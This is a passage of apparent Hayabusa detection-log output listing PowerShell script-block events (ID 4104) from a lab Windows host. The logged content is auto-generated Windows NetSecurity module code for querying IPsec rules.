([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) 
$__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) 
$__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = 
$false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 